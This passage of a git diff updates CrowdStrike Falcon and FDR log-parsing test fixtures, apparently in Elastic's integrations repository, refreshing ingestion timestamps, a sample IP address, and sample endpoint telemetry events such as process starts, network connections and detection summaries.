\"Detect\": false,\n \"InddetMask\": false,\n \"SensorOnly\": false,\n \"Rooting\": false,\n \"KillProcess\": true,\n \"KillSubProcess\": false,\n \"QuarantineMachine\": false,\n \"QuarantineFile\": false,\n \"PolicyDisabled\": false,\n \"KillParent\": false,\n \"OperationBlocked\": false,\n \"ProcessBlocked\": false\n }\n }\n}", "kind": "alert", "action": "Prevention, process killed.", @@ -141,7 +141,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-01T08:21:45.615786500Z", + "ingested": "2021-12-09T13:36:09.420134300Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1824,\n \"eventType\": \"IncidentSummaryEvent\",\n \"eventCreationTime\": 1583295476766,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"IncidentStartTime\": 1583295228,\n \"IncidentEndTime\": 1583295470,\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"State\": \"open\",\n \"FineScore\": 1.2\n }\n}", "kind": "alert", "action": "incident", @@ -186,7 +186,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.615794200Z", + "ingested": "2021-12-09T13:36:09.420138700Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 22865,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1593186952000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"Crowdstrike\",\n \"UserIp\": \"\",\n \"OperationName\": \"quarantined_file_update\",\n \"ServiceName\": \"quarantined_files\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"quarantined_file_id\",\n \"ValueString\": \"35b35a53da374816a6b471cf09e12019_a076d3121743755f2d4f8d4d5807f0bc013177f7847d09b48e76de88ace08c78\"\n },\n {\n \"Key\": \"action_taken\",\n \"ValueString\": \"quarantined\"\n }\n ],\n \"UTCTimestamp\": 1593186952\n }\n}", "kind": "event", "action": "user_activity_audit_event", diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log index 6a811c1efb2..87070601c11 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log @@ -71,7 +71,7 @@ }, "event": { "UserId": "first.last@company.com", - "UserIp": "165.225.220.184", + "UserIp": "67.43.156.15", "OperationName": "saml2Assert", "ServiceName": "Crowdstrike Authentication", "Success": true, diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json index fb573efedc8..b7a41c8d63e 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json @@ -43,7 +43,7 @@ "name": "TESTDEVICE01" }, "event": { - "ingested": "2021-08-13T09:13:03.062166Z", + "ingested": "2021-12-09T13:36:09.744769800Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70689,\n \"eventType\": \"FirewallMatchEvent\",\n \"eventCreationTime\": 1595248906000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"DeviceId\": \"718af202ab2c4ba5b6a5d10d39c0e0a5\",\n \"CustomerId\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"Ipv\": \"ipv4\",\n \"CommandLine\": \"\",\n \"ConnectionDirection\": \"1\",\n \"EventType\": \"FirewallRuleIP4Matched\",\n \"Flags\": {\n \"Audit\": false,\n \"Log\": false,\n \"Monitor\": true\n },\n \"HostName\": \"TESTDEVICE01\",\n \"ICMPCode\": \"\",\n \"ICMPType\": \"\",\n \"ImageFileName\": \"\",\n \"LocalAddress\": \"10.37.60.194\",\n \"LocalPort\": \"445\",\n \"MatchCount\": 1,\n \"MatchCountSinceLastReport\": 1,\n \"NetworkProfile\": \"2\",\n \"PID\": \"206158879910\",\n \"PolicyName\": \"PROD-FW-Workstations-General\",\n \"PolicyID\": \"74e7f1552a3a4d90a6d65578642c8584\",\n \"Protocol\": \"6\",\n \"RemoteAddress\": \"10.37.60.21\",\n \"RemotePort\": \"54952\",\n \"RuleAction\": \"2\",\n \"RuleDescription\": \"\",\n \"RuleFamilyID\": \"fec73e96a1bf4481be582c3f89b234fa\",\n \"RuleGroupName\": \"SMB Rules\",\n \"RuleName\": \"Inbound SMB Block \\u0026 Log Private\",\n \"RuleId\": \"4877172638743447345\",\n \"Status\": \"\",\n \"Timestamp\": \"2020-07-20T12:41:44Z\",\n \"TreeID\": \"\"\n }\n}", "code": "FirewallRuleIP4Matched", "kind": "event", @@ -108,7 +108,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-08-13T09:13:03.062180200Z", + "ingested": "2021-12-09T13:36:09.744778800Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57181,\n \"eventType\": \"IncidentSummaryEvent\",\n \"eventCreationTime\": 1595005328414,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"IncidentStartTime\": 1595005316,\n \"IncidentEndTime\": 1595005316,\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:1234567893cd4e55b3a832ba2140478e:72e291e40c1544d390eabf135d875e54\",\n \"State\": \"open\",\n \"FineScore\": 0.1,\n \"LateralMovement\": 0\n }\n}", "kind": "alert", "action": "incident", @@ -145,7 +145,7 @@ }, { "source": { - "ip": "165.225.220.184" + "ip": "67.43.156.15" }, "message": "Crowdstrike Authentication", "tags": [ @@ -161,12 +161,12 @@ "first.last@company.com" ], "ip": [ - "165.225.220.184" + "67.43.156.15" ] }, "event": { - "ingested": "2021-08-13T09:13:03.062185300Z", - "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70509,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1595247970093,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"first.last@company.com\",\n \"UserIp\": \"165.225.220.184\",\n \"OperationName\": \"saml2Assert\",\n \"ServiceName\": \"Crowdstrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1595247970,\n \"AuditKeyValues\": [\n {\n \"Key\": \"trace_id\",\n \"ValueString\": \"b0b33836-555c-4e0e-a5ef-d368f6799f6b\"\n },\n {\n \"Key\": \"actor_user\",\n \"ValueString\": \"first.last@company.com\"\n },\n {\n \"Key\": \"actor_user_uuid\",\n \"ValueString\": \"123ab123-abc1-12a1-12a1-12a1ab12a1a1\"\n },\n {\n \"Key\": \"actor_cid\",\n \"ValueString\": \"123456a1ab1a12abc12ab1234abcd12a\"\n },\n {\n \"Key\": \"target_user\",\n \"ValueString\": \"first.last@company.com\"\n }\n ]\n }\n}", + "ingested": "2021-12-09T13:36:09.744784800Z", + "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70509,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1595247970093,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"first.last@company.com\",\n \"UserIp\": \"67.43.156.15\",\n \"OperationName\": \"saml2Assert\",\n \"ServiceName\": \"Crowdstrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1595247970,\n \"AuditKeyValues\": [\n {\n \"Key\": \"trace_id\",\n \"ValueString\": \"b0b33836-555c-4e0e-a5ef-d368f6799f6b\"\n },\n {\n \"Key\": \"actor_user\",\n \"ValueString\": \"first.last@company.com\"\n },\n {\n \"Key\": \"actor_user_uuid\",\n \"ValueString\": \"123ab123-abc1-12a1-12a1-12a1ab12a1a1\"\n },\n {\n \"Key\": \"actor_cid\",\n \"ValueString\": \"123456a1ab1a12abc12ab1234abcd12a\"\n },\n {\n \"Key\": \"target_user\",\n \"ValueString\": \"first.last@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" ], @@ -178,7 +178,7 @@ }, "crowdstrike": { "event": { - "UserIp": "165.225.220.184", + "UserIp": "67.43.156.15", "OperationName": "saml2Assert", "ServiceName": "Crowdstrike Authentication", "UserId": "first.last@company.com", @@ -231,7 +231,7 @@ ] }, "event": { - "ingested": "2021-08-13T09:13:03.062189600Z", + "ingested": "2021-12-09T13:36:09.744790600Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70683,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1595248885000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"Crowdstrike\",\n \"UserIp\": \"\",\n \"OperationName\": \"quarantined_file_update\",\n \"ServiceName\": \"quarantined_files\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"quarantined_file_id\",\n \"ValueString\": \"ab1cde05567b455b93afbe2d3df352c9_328024a065630f897f09963d4b67b0c95d4054f540c2ca8014d5b012718bfa21\"\n },\n {\n \"Key\": \"action_taken\",\n \"ValueString\": \"quarantined\"\n }\n ],\n \"UTCTimestamp\": 1595248885\n }\n}", "kind": "event", "action": "user_activity_audit_event", @@ -293,7 +293,7 @@ "name": "TESTDEVICE01" }, "event": { - "ingested": "2021-08-13T09:13:03.062198Z", + "ingested": "2021-12-09T13:36:09.744796500Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57217,\n \"eventType\": \"RemoteResponseSessionStartEvent\",\n \"eventCreationTime\": 1595006093000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"330633db-1cda-4355-b0d8-2c2edc91fe3e\",\n \"HostnameField\": \"TESTDEVICE01\",\n \"UserName\": \"first.last@company.com\",\n \"StartTimestamp\": 1595006093\n }\n}", "kind": "event", "action": [ @@ -349,7 +349,7 @@ "name": "TESTDEVICE01" }, "event": { - "ingested": "2021-08-13T09:13:03.062207500Z", + "ingested": "2021-12-09T13:36:09.744802300Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57269,\n \"eventType\": \"RemoteResponseSessionEndEvent\",\n \"eventCreationTime\": 1595006899000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"330633db-1cda-4355-b0d8-2c2edc91fe3e\",\n \"HostnameField\": \"TESTDEVICE01\",\n \"UserName\": \"first.last@company.com\",\n \"EndTimestamp\": 1595006899,\n \"Commands\": [\n \"cd \\\\Program Files (x86)\\\\Symantec\",\n \"ls .\",\n \"cd \\\\Program Files (x86)\",\n \"ls .\",\n \"reg query HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default\",\n \"reg set HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default GroupingTags -ValueType=```REG_SZ``` -Value=```Protect```\",\n \"reg query HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CrowdStrike\\\\{9b03c1d9-3138-44ed-9fae-d9f4c034b88d}\\\\{16e0423f-7058-48c9-a204-725362b67639}\\\\Default\",\n \"restart\",\n \"restart -Confirm\"\n ]\n }\n}", "kind": "event", "action": [ @@ -466,7 +466,7 @@ }, "event": { "severity": 2, - "ingested": "2021-08-13T09:13:03.062211300Z", + "ingested": "2021-12-09T13:36:09.744808Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 57047,\n \"eventType\": \"DetectionSummaryEvent\",\n \"eventCreationTime\": 1595002291000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"ProcessStartTime\": 1595002290,\n \"ProcessEndTime\": 1595002290,\n \"ProcessId\": 663790158277,\n \"ParentProcessId\": 627311656469,\n \"ComputerName\": \"TESTDEVICE01\",\n \"UserName\": \"First.last\",\n \"DetectName\": \"NGAV\",\n \"DetectDescription\": \"This file meets the machine learning-based on-sensor AV protection's low confidence threshold for malicious files.\",\n \"Severity\": 2,\n \"SeverityName\": \"Low\",\n \"FileName\": \"filename.exe\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\",\n \"CommandLine\": \"\\\"C:\\\\ProgramData\\\\file\\\\path\\\\filename.exe\\\" \",\n \"SHA256String\": \"0a123b185f9a32fde1df59897089014c92e3d08a0533b54baa72ba2a93d64deb\",\n \"MD5String\": \"0ab1235adca04aef6239f5496ef0a5df\",\n \"SHA1String\": \"0000000000000000000000000000000000000000\",\n \"MachineDomain\": \"NA\",\n \"ExecutablesWritten\": [\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939Configuration.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939Configuration.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939CanPackMessage.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n },\n {\n \"Timestamp\": 1595002290,\n \"FileName\": \"NEURO_200_J1939CanPackMessage.mexw64\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume2\\\\ProgramData\\\\file\\\\path\\\\is\\\\right\\\\here\\\\folder\"\n }\n ],\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/activity/detections/detail/1abcd2345b8c4151a0cb45dcfbe6d3d0/124559902719?_cid=12345a1bc2d34fghi56jk7890lmno12p\",\n \"SensorId\": \"1abcd2345b8c4151a0cb45dcfbe6d3d0\",\n \"IOCType\": \"hash_sha256\",\n \"IOCValue\": \"0a123b185f9a32fde1df59897089014c92e3d08a0533b54baa72ba2a93d64deb\",\n \"DetectId\": \"ldt:1abcd2345b8c4151a0cb45dcfbe6d3d0:124559902719\",\n \"LocalIP\": \"10.1.190.117\",\n \"MACAddress\": \"54-ad-d4-d2-a8-0b\",\n \"Tactic\": \"Machine Learning\",\n \"Technique\": \"Sensor-based ML\",\n \"Objective\": \"Falcon Detection Method\",\n \"PatternDispositionDescription\": \"Detection, process would have been blocked if related prevention policy setting was enabled.\",\n \"PatternDispositionValue\": 2304,\n \"PatternDispositionFlags\": {\n \"Indicator\": false,\n \"Detect\": false,\n \"InddetMask\": false,\n \"SensorOnly\": false,\n \"Rooting\": false,\n \"KillProcess\": false,\n \"KillSubProcess\": false,\n \"QuarantineMachine\": false,\n \"QuarantineFile\": false,\n \"PolicyDisabled\": true,\n \"KillParent\": false,\n \"OperationBlocked\": false,\n \"ProcessBlocked\": true,\n \"RegistryOperationBlocked\": false,\n \"CriticalProcessDisabled\": false,\n \"BootupSafeguardEnabled\": false,\n \"FsOperationBlocked\": false\n },\n \"ParentImageFileName\": \"\\\\Device\\\\HarddiskVolume2\\\\Windows\\\\explorer.exe\",\n \"ParentCommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\",\n \"GrandparentImageFileName\": \"\\\\Device\\\\HarddiskVolume2\\\\Windows\\\\System32\\\\userinit.exe\",\n \"GrandparentCommandLine\": \"C:\\\\Windows\\\\system32\\\\userinit.exe\"\n }\n}", "kind": "alert", "action": "Detection, process would have been blocked if related prevention policy setting was enabled.", diff --git a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log index 291c2e82b95..ebf722dbd86 100644 --- a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log +++ b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log @@ -1,125 +1,125 @@ -{"ParentProcessId":"362225661973273550","SourceProcessId":"362225661973273550","aip":"208.210.242.193","SessionProcessId":"363970027584976556","SyntheticPR2Flags":"8","event_platform":"Mac","SVUID":"501","id":"ffffffff-1111-11eb-8dd4-061759968cdf","EffectiveTransmissionClass":"2","timestamp":"1625677521162","ProcessGroupId":"363970027584976556","event_simpleName":"SyntheticProcessRollup2","RawProcessId":"9505","ContextTimeStamp":"1625677521.137","GID":"20","ConfigStateHash":"1620585913","SVGID":"20","ConfigBuild":"1007.4.0013701.1","UID":"501","CommandLine":"/bin/sh -s unix:cmd","TargetProcessId":"363970027584976556","ImageFileName":"/bin/sh","RGID":"501","SourceThreadId":"0","Entitlements":"15","name":"SyntheticProcessRollup2MacV3","RUID":"501","aid":"ffffffffa63e404bba4bff7465ab3afb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"FileDeletedCount":"0","DirectoryCreatedCount":"0","ContextThreadId":"0","aip":"208.254.115.95","NetworkConnectCount":"0","NetworkListenCount":"0","event_platform":"Mac","NetworkBindCount":"0","NetworkRecvAcceptCount":"0","id":"ffffffff-1111-11eb-9d75-02bcf3ade03b","NewExecutableWrittenCount":"0","NetworkCloseCount":"0","EffectiveTransmissionClass":"3","SuspectStackCount":"0","timestamp":"1625677524102","event_simpleName":"EndOfProcess","RawProcessId":"33454","ContextTimeStamp":"1625677523.068","ConfigStateHash":"3090255842","ContextProcessId":"365053603452626914","AsepWrittenCount":"0","SuspiciousDnsRequestCount":"0","ConfigBuild":"1007.4.0013701.1","NetworkCapableAsepWriteCount":"0","ExecutableDeletedCount":"0","TargetProcessId":"365053603452626914","DnsRequestCount":"0","Entitlements":"15","name":"EndOfProcessMacV15","aid":"ffffffff3c0846978560dbc0048d6555","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"RawBindIP6","ContextTimeStamp":"1625677488.594","LocalAddressIP6":"ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0","RemoteAddressIP6":"ff88:1:1:ffff:1014:ce99:9b06:ab12","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"365042236081053654","RemotePort":"546","aip":"208.126.205.223","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"547","Entitlements":"15","name":"RawBindIP6MacV10","id":"ffffffff-1111-11eb-ad8d-064c77be2fd1","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffffc59c473aa7fcbbe7438082cb","ConnectionDirection":"2","InContext":"0","timestamp":"1625677488615","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"1620585913","Timeout":"600","aip":"208.130.207.129","SHA256HashData":"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018","ProcessCount":"4","ConfigBuild":"1007.4.0013701.1","UID":"502","event_platform":"Mac","CommandLine":"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\n feature_name: FEATURE_NAME,\n variants: [FEATURE_VARIANT],\n )","Entitlements":"15","name":"ProcessRollup2StatsMacV1","id":"ffffffff-1111-11eb-822b-06081a3f0f45","EffectiveTransmissionClass":"2","aid":"ffffffff59fe460783ea45d59e417d6f","timestamp":"1625677504527","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"3090255842","NetworkContainmentState":"0","aip":"208.49.81.196","ConfigIDBase":"65994753","SensorStateBitMap":"0","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"SensorHeartbeatMacV4","ConfigIDPlatform":"4","id":"ffffffff-1111-11eb-97c6-02fd02aca859","ConfigIDBuild":"13701","EffectiveTransmissionClass":"0","aid":"ffffffffe1ad47b6b5b44ae9151a6cf3","ProvisionState":"1","timestamp":"1625677514783","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"MachOSubType":"1","ParentProcessId":"362213307092004097","SourceProcessId":"362213307092004097","aip":"208.24.129.49","SessionProcessId":"362213307092004097","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Mac","ProcessEndTime":"","SVUID":"0","ParentBaseFileName":"launchd","id":"ffffffff-1111-11eb-a9ce-02e9216bdbcb","EffectiveTransmissionClass":"2","timestamp":"1625677502500","ProcessGroupId":"362213307092004097","event_simpleName":"ProcessRollup2","RawProcessId":"56254","GID":"0","ConfigStateHash":"1620585913","SVGID":"0","MD5HashData":"88922d50263b059696c2af5a99906562","SHA256HashData":"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6","ConfigBuild":"1007.4.0013701.1","UID":"0","CommandLine":"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000","TargetProcessId":"363276350115996101","ImageFileName":"/usr/libexec/xpcproxy","RGID":"0","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2MacV5","RUID":"0","ProcessStartTime":"1625677502.233","aid":"ffffffff8be84591864008eb2e484920","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkReceiveAcceptIP4","ContextTimeStamp":"1625677504.982","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307488247882","RemotePort":"53","aip":"208.238.3.157","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"39920","Entitlements":"15","name":"NetworkReceiveAcceptIP4LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","RemoteAddressIP4":"208.230.0.2","ConnectionDirection":"1","InContext":"0","timestamp":"1625677505511","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"208.30.0.2","event_simpleName":"RawBindIP4","ContextTimeStamp":"1625677521.866","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"362579458925546303","RemotePort":"0","aip":"208.215.150.206","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"53","Entitlements":"15","name":"RawBindIP4MacV10","id":"ffffffff-1111-11eb-81d4-0282ad9ac82d","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff01fc49949cf06bf0bce3c010","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677522009","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677523.901","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP4":"127.0.0.1","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364783686797112486","RemotePort":"50626","aip":"208.187.110.246","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP6MacV10","id":"ffffffff-1111-11eb-97c6-02fd02aca859","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff083845f68a7de3d95cb34361","ConnectionDirection":"0","InContext":"0","timestamp":"1625677524048","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ParentProcessId":"38911774195823","SourceProcessId":"38911774195823","aip":"208.194.125.248","SessionProcessId":"38911772846634","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1625677535.102","SVUID":"114","ParentBaseFileName":"bash","id":"ffffffff-1111-11eb-bad4-02690d039c6b","EffectiveTransmissionClass":"2","timestamp":"1625677535482","ProcessGroupId":"9277112078","event_simpleName":"ProcessRollup2","RawProcessId":"73249","GID":"119","ConfigStateHash":"1284133626","SVGID":"119","MD5HashData":"29037cef466fa57f03bd1b2a092c47a4","SHA256HashData":"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112","ConfigBuild":"1007.8.0010912.1","UID":"114","CommandLine":"pgbackrest --stanza\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG","TargetProcessId":"38911778380590","ImageFileName":"/usr/bin/pgbackrest","RGID":"119","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2LinV6","RUID":"114","ProcessStartTime":"1625677535.068","aid":"ffffffffcf45409f87ed463b40c368ec","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677503.713","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307455014463","RemotePort":"0","aip":"208.238.3.157","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"41952","Entitlements":"15","name":"NetworkConnectIP6LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","ConnectionDirection":"0","InContext":"0","timestamp":"1625677503947","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"OoxmlFileWritten","ContextTimeStamp":"1625677520.973","ConfigStateHash":"3090255842","ContextProcessId":"365044948432500700","ContextThreadId":"0","aip":"208.24.230.3","FileIdentifier":"0500000100000000000000000000000021b0260000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OoxmlFileWrittenMacV1","id":"ffffffff-1111-11eb-8ad1-02cfdadef55f","EffectiveTransmissionClass":"2","aid":"ffffffff20bd481a98a3d1f6191047ff","timestamp":"1625677521081","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508"} -{"LocalAddressIP4":"208.230.137.65","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677530.308","ConfigStateHash":"3469235958","ConnectionFlags":"0","ContextProcessId":"12227094573885","RemotePort":"80","aip":"208.144.51.215","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59926","Entitlements":"15","name":"NetworkConnectIP4LinV5","id":"ffffffff-1111-11eb-b727-028bbe41f38d","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffffbd064538b214ab0dce8e82c3","RemoteAddressIP4":"208.254.169.254","ConnectionDirection":"0","InContext":"0","timestamp":"1625677530841","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1156120155","ChannelDiffStatus":"1","aip":"208.231.69.37","ChannelVersionRequired":"0","ChannelId":"12","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV2","id":"ffffffff-1111-11eb-b7e0-02332cdcc16d","ErrorCode":"0","aid":"ffffffff25b14d4aa96de99e24bad2fa","timestamp":"1625677493974","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677520.686","aip":"208.203.151.21","PhysicalAddress":"6e-9e-e0-1f-6d-7d","InterfaceAlias":"vethdeb0243","InterfaceIndex":"3736","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP6LinV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","PhysicalAddressLength":"6","aid":"ffffffffc9114c1898e79604708955a6","timestamp":"1625677521218","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1620585913","ChannelDiffStatus":"1","aip":"208.169.10.84","ChannelVersionRequired":"0","ChannelId":"210","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ChannelVersionRequiredMacV2","id":"ffffffff-1111-11eb-8cc5-02c6fb049dd3","ErrorCode":"0","EffectiveTransmissionClass":"0","aid":"ffffffff2d7b4778a73b2cf58d327e42","timestamp":"1625677480455","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"1156120155","NetworkContainmentState":"0","aip":"208.231.69.37","ConfigIDBase":"65994753","SensorStateBitMap":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ConfigurationVersion":"10","name":"SensorHeartbeatLinV4","ConfigIDPlatform":"8","id":"ffffffff-1111-11eb-993f-02b8dc387eb5","ConfigIDBuild":"11611","aid":"fffffffff6e146908cbf31d72b94b626","timestamp":"1625677540292","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 